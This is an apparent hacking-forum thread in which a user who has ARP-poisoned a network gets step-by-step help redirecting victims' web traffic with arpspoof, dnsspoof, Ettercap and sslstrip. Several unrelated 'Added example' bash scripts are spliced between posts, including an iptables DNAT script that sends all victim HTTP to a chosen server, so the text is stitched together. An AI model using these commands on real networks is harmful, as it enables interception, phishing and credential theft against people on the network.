Forum Thread: IPtables

IPtables

Hello people. I would like to ask how I can redirect all traffic on the network to another web server, for example a local Apache server. I did ARP cache poisoning, and all traffic on the network seems to be going through me, but I need to redirect it somewhere else.

Thanks!

36 Responses

Are you basically executing an arpspoof-like attack?

TRT

Yes (arpspoof -t <target IP> <Gateway>) and in another terminal (arpspoof -t <gateway> <target IP>)

What do you mean by "I need to redirect it somewhere else"? Are you looking to set up a phishing attack? Or do you just want to sniff traffic with tools like tcpdump and Wireshark?

Be specific about what you want to do, and this requires a reply with more than one line of explanation. It is really hard to help you otherwise.

TRT

Yes, I know, sorry. No, it won't be for phishing. Does it matter where it will be redirected? I can say it will be redirected to another website IP.

For that you could use dnsspoof (or something similar). But first you will need to create a file that specifies the redirections, kind of like the /etc/hosts file. Let's go through the steps:

> touch redirect
> nano redirect

Now insert a website that you want to be redirected, followed by a tab, followed by the IP address of where you want to redirect the victim.

For example, let's say I wanted to redirect the victim to WHT every time they try to access Adobe's website. I would insert the line:

adobe.com****8.26.65.101
(Four stars indicate a tab, I just can't write tabs in the comments here.)

If you want to add more entries, do so on a new line for each entry. You can also specify subdomains, all subdomains with a * (wildcard), and just IP to IP redirects. Basically the format is:

<source><tab_key><destination>

Moving on, save the file by pressing Ctrl+x then y and finally Enter. Now to get the process going, type:
> dnsspoof -i <interface> -f <file>
In our example case, the file was called redirect and let's pretend the interface is wlan0:
> dnsspoof -i wlan0 -f redirect

That's pretty much it really. To see if it actually worked, use tcpdump and check if the traffic was redirected to the websites you specified in the redirect file.
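Added check, not part of the reply above: a small bash script that writes a dnsspoof -f file and sanity-checks it before any poisoning is started. Two details matter here. dnsspoof(8) documents the -f file as hosts(5) format, which is address first and then name (the reverse of the order shown in the lines above, and of Ettercap's etter.dns layout); and a wildcard line such as *.adobe.com does not cover the bare adobe.com, so the apex needs its own line, as the reply says. The glob-style matching in resolve_name is an assumption made for this checker; the thread does not state dnsspoof's exact matching rules. The address 8.26.65.101 is the one used in the reply.

```bash
#!/usr/bin/env bash
# Added example, not from the thread: write a dnsspoof -f file and sanity-check
# it before poisoning anything. dnsspoof(8) documents -f as a file in hosts(5)
# format, i.e. ADDRESS first, then NAME. Glob-style wildcard matching in
# resolve_name is an assumption; the thread does not state dnsspoof's rules.
set -eu

# True if $1 is a dotted-quad IPv4 address with every octet in 0..255.
is_ipv4() {
    local re='^([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})\.([0-9]{1,3})$' o
    [[ $1 =~ $re ]] || return 1
    for o in "${BASH_REMATCH[@]:1}"; do
        [ "$o" -le 255 ] || return 1
    done
}

# Write the two-line file from the thread in hosts(5) order. The bare apex line
# is needed because "*.adobe.com" does not match "adobe.com" itself.
write_redirect_file() {
    printf '%s\t%s\n' \
        8.26.65.101 adobe.com \
        8.26.65.101 '*.adobe.com' > "$1"
}

# Check every non-comment line: field 1 IPv4, field 2 hostname or *.hostname,
# nothing else. Reports each bad line on stderr; returns 1 if any line is bad.
validate_redirect_file() {
    local path="$1" host_re='^(\*\.)?[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$'
    local n=0 bad=0 line addr name extra
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case "$line" in ''|'#'*) continue ;; esac
        read -r addr name extra <<<"$line"
        if ! is_ipv4 "$addr"; then
            echo "line $n: '$addr' is not an IPv4 address (hosts(5) order is ADDRESS then NAME)" >&2
            bad=1
        elif [[ ! $name =~ $host_re ]]; then
            echo "line $n: '$name' is not a hostname or *.hostname pattern" >&2
            bad=1
        elif [ -n "$extra" ]; then
            echo "line $n: unexpected trailing field '$extra'" >&2
            bad=1
        fi
    done < "$path"
    return "$bad"
}

# Print the address a query for NAME ($2) would be answered with; the first
# matching line wins. Returns 1 when nothing matches (the real reply stands).
resolve_name() {
    local path="$1" query="$2" addr name extra
    while read -r addr name extra; do
        case "$addr" in ''|'#'*) continue ;; esac
        # $name is deliberately unquoted so that "*" acts as a glob.
        case "$query" in $name) printf '%s\n' "$addr"; return 0 ;; esac
    done < "$path"
    return 1
}

# Demo: build the file, validate it, and show what a few names would get.
demo() {
    local f q
    f="$(mktemp)"
    write_redirect_file "$f"
    validate_redirect_file "$f"
    for q in adobe.com www.adobe.com get.adobe.com example.com; do
        printf '%-16s -> %s\n' "$q" \
            "$(resolve_name "$f" "$q" || echo '(no entry, not spoofed)')"
    done
    rm -f "$f"
}

demo
```

Run it as a normal user; it touches nothing on the network. If validate_redirect_file complains that the first field is not an IPv4 address, the file has name and address swapped, which is the most common reason an otherwise working arpspoof setup never sees a forged answer.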

TRT

Dnsspoof showed error. I will quote that error in a few minutes here.

Udp dst port 53 and not source <target server IP>

Drop a few screenshots (if you can) of the entire process.
(PS: use the in-built gallery feature so as not to clutter the comments)

TRT

I am on my phone and my browser is formatting this website incorrectly. When I push the picture button, I can only see a field for a URL to take the image from, and I cannot see an upload option...

Hold on a sec, this isn't an error. Is this what you are seeing?
dnsspoof: listening on __ [udp dst port 53 and not src __ ]

Have you tested the victim's side? It should work just fine. I'm highly positive you haven't tried to verify everything from the victim's machine.

TRT

Yes, that's it. Surprisingly, I did. I tried visiting the website I want to redirect and it did not work. My hosts file is named hosts, without any extension, and it looks like this:

www.facebook.com <four spaces> destination IP

The 'error' to which you referred is not an error at all, in fact. Also, I can now tell you exactly why it failed. Facebook automatically creates an https link, even if you specify http in your browser. To support https you will need to use sslstrip (or sslstrip+ apparently).

How about you try to use the line from the above directions:
adobe.com****8.26.65.101
(Again, four stars for a tab.)

Then enter adobe.com (without 'www') from the victim's side and see if that redirects to this domain's beautiful front page.

TRT

The problem is I tried non-SSL websites in hosts file too, and it did the same.

If you are still on about the [udp dst port 53...] message you are seeing, then I don't know how to reiterate to you that it is not, in fact, an error. It is a message that is always shown by dnsspoof, and in all of the tests that I have conducted it has never indicated any sign of failure.

As for not being able to redirect, I don't know your exact issue. I have noticed, in the past, some people entering "www." before the domain name in the redirect file, and then when carrying out the actual test from the victim machine they forget to use it.

Not all websites have www as their main subdomain, and many do not redirect users who enter www to the front page. Therefore, if you want to cover all cases for a certain domain, you should add 2 entries:

adobe.com****8.26.65.101
*.adobe.com****8.26.65.101

This will ensure that whenever Adobe's domain is used, any and all subdomains, including the primary one, will redirect to WHT.

Carry out a few more trials, look over everything I've told you, make sure your adapter is not in monitor mode, reboot and start over. Then inform me of any accomplishments, if existent.

TRT

Can you give me your mail or Facebook or anything? I can send it there.

Have you already done echo 1 > /proc/sys/net/ipv4/ip_forward?

TRT, no accomplishment.
It's not working. I followed every one of your steps:

  1. echo 1 > /proc/sys/net/ipv4/ip_forward
  2. arpspoof -t <target local IP> <gateway>
  3. arpspoof -t <gateway> <target local IP>
  4. dnsspoof -f hosts

// Hosts file looks like this:
adobe.com TAB <destination website IP>
*.adobe.com TAB <destination website IP>
(It probably won't show the star before adobe.com because it will bold this text.)

  5. At the target, browse to adobe.com and it will show the home page of Adobe.

Alright, I might have figured out the issue, but I'm not entirely sure. Try changing the redirect file's contents to this:

adobe.com**A**8.26.65.101
*.adobe.com**A**8.26.65.101
(Two stars means 2 spaces, rather than a tab.)

Let me know if this works for you.

TRT

Not working, it did the same. It loaded their home page. For example, sslstrip is working great, along with urlsnarf and things like that. So arpspoof is configured correctly.

I will look into this when I get to the lab. This hasn't failed me, so I am curious to find out what I've missed out when explaining it to you.

TRT

TRT ... SUCCESS

Using Ettercap, I've redirected microsoft.com to my local IP. There are some problems, but I will try to fix them. Two more questions to get this done:

  1. Can I redirect ALL traffic on LAN to another IP ?
  2. What can we do about the dnsspoof program? I mean when I don't want to use Ettercap... because that one is not working.

hosts:
www.microsoft.com A 192.168.100.10
microsoft.com A 192.168.100.10

  1. Yes, you can set up an Apache proxy which will redirect traffic to a specific destination.
  2. I will look into dnsspoof when I find the opportunity, but right now just stick to Ettercap if it's working. I have a tutorial on it, in case you don't already know, so that might be of some help.

By the way, screenshot those Ettercap errors and drop them down below. Let's get them out of the way and concentrate on the bigger picture, which involves getting your DNS intermediary to redirect traffic successfully using dns spoof.
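Added example, not from any post in this thread: the question asked at the top of the thread (and again as question 1 above) is how to push all web traffic that the poisoned victim sends through this box to one web server, and the tool for that is iptables rather than DNS spoofing, since it works regardless of which hostname the victim asked for. The rules below DNAT every tcp/80 packet arriving on the LAN interface to the chosen web server; IFACE and WEB are assumed names, DRY_RUN defaults to printing the commands instead of running them, and the addresses used in the demo are the ones from this thread. This only covers plain HTTP; HTTPS is still subject to certificate checks, which is what the sslstrip discussion above is about.

```bash
#!/usr/bin/env bash
# Added example, not from the thread: send every HTTP (tcp/80) request that the
# ARP-poisoned victim pushes through this box to one web server, using iptables
# DNAT. Assumed names: IFACE (LAN interface), WEB (web server address; use this
# box's own LAN address to land on the local Apache). DRY_RUN=1 (the default)
# only prints the commands, so the script can be read and tested without root.
set -eu

# Print the command in dry-run mode, otherwise execute it.
run() {
    if [ "${DRY_RUN:-1}" = 1 ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Install the redirect. Order matters: forwarding first, then the NAT rules.
redirect_http_to() {
    local IFACE="$1" WEB="$2"
    # Without forwarding, the victim's non-HTTP traffic is black-holed here.
    run sysctl -w net.ipv4.ip_forward=1
    # Rewrite the destination of any tcp/80 packet arriving from the LAN.
    run iptables -t nat -A PREROUTING -i "$IFACE" -p tcp --dport 80 \
        -j DNAT --to-destination "$WEB:80"
    # If WEB is another host on the same LAN, its replies must come back through
    # this box (not straight to the victim, which would reset the connection),
    # so source-NAT the forwarded packets as well.
    run iptables -t nat -A POSTROUTING -o "$IFACE" -p tcp -d "$WEB" --dport 80 \
        -j MASQUERADE
}

# Undo with -D and the identical match so only these two rules are removed.
undo_redirect() {
    local IFACE="$1" WEB="$2"
    run iptables -t nat -D PREROUTING -i "$IFACE" -p tcp --dport 80 \
        -j DNAT --to-destination "$WEB:80"
    run iptables -t nat -D POSTROUTING -o "$IFACE" -p tcp -d "$WEB" --dport 80 \
        -j MASQUERADE
}

# Dry run: print what would be executed for the LAN web server from the thread.
redirect_http_to eth0 192.168.100.10
undo_redirect eth0 192.168.100.10
```

To apply the rules for real, run it as root with DRY_RUN=0 after arpspoof is already running in both directions; the MASQUERADE rule is harmless when WEB is this box's own address, because locally delivered packets never traverse POSTROUTING.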

TRT

OK. Yes, Ettercap is working now. I am going to make those screenshots now.
Thanks a lot.

I fixed those errors so we can now concentrate on dnsspoof. I tried using Ettercap's etter.dns file for dnsspoof (dnsspoof -f etter.dns) and it didn't work. Same output as before: udp dst port 53...

Yes, I figured it wouldn't work, just wanted to make sure that was the case. Just use a file without an extension, with the entries I originally told you about, as the redirect file:

> touch redirect
> nano redirect
adobe.com****8.26.65.101
*.adobe.com****8.26.65.101
> arpspoof -i <interface> -t <target> <gateway>
> arpspoof -i <interface> -t <gateway> <target>
> dnsspoof -i <interface> -f redirect
dnsspoof: listening on <interface> [udp dst port 53 and not src _ ]

(Victim)
*visits adobe.com*

(Back to Attacker)
victim_IP.xxxx > gateway_IP.53: xxxx+ A? adobe.com

(Victim)
*presented with WHT's front page*
*looks confused*

And, for the millionth time, "udp dst port 53..." is not an error message. It is simply a declaration that port 53 (domain) will be used and that it was successful in its implementation (and so on).
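Added example, not part of the reply above: the attempt a few posts up to feed etter.dns straight into dnsspoof -f cannot work, because the two files use different layouts. Ettercap's etter.dns records read name, record type, value (the "www.microsoft.com A 192.168.100.10" lines posted earlier), while dnsspoof(8) documents its -f file as hosts(5) format, address then name, and says it uses only the IPv4 (A) entries. The converter below, written for this page, turns the one into the other; the sample records are constructed, with the two microsoft.com lines taken from the thread.

```bash
#!/usr/bin/env bash
# Added example, not from the thread: turn Ettercap's etter.dns A records into
# the hosts(5)-style lines (ADDRESS then NAME) that dnsspoof -f reads. The
# sample records below are constructed for the demo; the two microsoft.com
# lines mirror the ones posted in the thread.
set -eu

# Reads etter.dns records on stdin, writes hosts(5) lines on stdout.
# etter.dns records look like:  name  TYPE  value   (TYPE is A, AAAA, PTR, ...)
# dnsspoof -f uses only IPv4 (A) entries, so everything else is dropped.
etter_to_hosts() {
    local name type value extra
    while read -r name type value extra; do
        case "$name" in ''|'#'*) continue ;; esac   # blank lines and comments
        [ "$type" = "A" ] || continue
        printf '%s\t%s\n' "$value" "$name"
    done
}

# Constructed etter.dns sample (not a real Ettercap file).
sample_etter_dns() {
    cat <<'EOF'
# dns_spoof records (constructed sample)
www.microsoft.com   A    192.168.100.10
microsoft.com       A    192.168.100.10
*.microsoft.com     A    192.168.100.10
ipv6.microsoft.com  AAAA 2001:db8::10
www.microsoft.com   PTR  192.168.100.10
EOF
}

# Demo: convert the sample. Redirect stdout to a file and pass that file to
# dnsspoof -i <interface> -f <file>.
convert_sample() {
    sample_etter_dns | etter_to_hosts
}

convert_sample
```

Only the three A records survive; the AAAA and PTR lines are dropped because dnsspoof's -f file has no place for them.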

TRT

Can I create that file using another editor (graphical) ?

You can use any editor you like. I just find nano very quick and easy. You can even just do:
> nano redirect
*type your entries*
Ctrl+O then Enter then Ctrl+X and you're done with this step.

Use whatever you feel comfortable with. Just know that getting accustomed to CLI interfaces will gradually make you more comfortable when in their presence.

TRT

It's not working, it's not redirecting...

Nope, not working....

Are you running anything in a virtual machine? Have you properly performed the ARP poisoning step? Is the victim actually on your network? Type ping -c 5 <target_IP> then ping -c 5 <gateway_IP> and reply back with a Pastebin link to both outputs. None of this makes any sense to me, as I have tested this numerous times.

TRT

Sorry, but do you think I am retarded, that I can't follow exact steps? Of course I did, and IT IS on my LAN. I can't do this using Pastebin. Both of them are responding with 64 bytes of data. And no, I am running Kali on my notebook and not in a VM.

Wait a second ...
ETTERCAP

I've modified Ettercap's DNS spoof file and I used their example for the Microsoft website. Ettercap's output was something like "spoofed microsoft.com to <IP address>".

I am trying to change that website and IP to test it out if it's really working. In that file, it is www.microsoft.com A <IP>.

Do you think I am going to assist you if you continue to be so agitated? I am giving you answers based on the information available to me. Unless you are meticulous I will have to carry on hypothesising, and we both know that hasn't solved anything yet.

TRT

Ok, let it be. I will use Ettercap instead...

Simtoon101:

If you are not grateful for all the help that TRT offered you, you don't deserve his help.
